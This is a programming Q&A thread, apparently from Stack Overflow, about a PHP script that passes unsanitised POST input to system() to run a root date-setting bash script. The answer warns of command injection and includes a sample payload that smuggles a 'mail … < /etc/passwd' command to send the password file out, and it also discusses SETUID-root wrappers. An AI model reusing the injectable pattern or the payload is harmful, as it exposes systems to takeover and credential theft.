I need to change the server date by running a bash script called by php. When i invoke the bash script from shell it works, but if i call it via php then it doesn't work. The bash script is run as root.
php script code:
<?php
$time = $_POST['input_time'];
$command = "/home/tutul/bin/timetest.sh";
$output=system("$command $time");
echo "$output";
?>
bash script code:
#! /bin/sh
date $1
hwclock --systohc --utc
What am i doing wrong here?
I tried to run it on my local machine when logged in as root, so i guess the script is invoked as root?
Best Answer
First, I assume you realize that PHP script is susceptible to command injection, yes? For example, if I POST to the script with "
input_time=whocares%3Bmail+me%40gmail.com+%3C+%2Fetc%2Fpasswd" I could expect a nice password file in my inbox.Second, setting the system time requires root privileges. If you were calling a binary executable, you could make it SETUID (
chmod u+s $program; chown root $program). Fortunately, Linux does not respect the SETUID bit on scripts. If you are absolutely set on this technique, one fix is to write a C wrapper to call your script as root. The wrapper would be SETUID root and would call your script. If you do this, please be sure to sanitize the input before passing it off to your script!EDIT:
https://stackoverflow.com/questions/556194/calling-a-script-from-a-setuid-root-c-program-script-does-not-run-as-root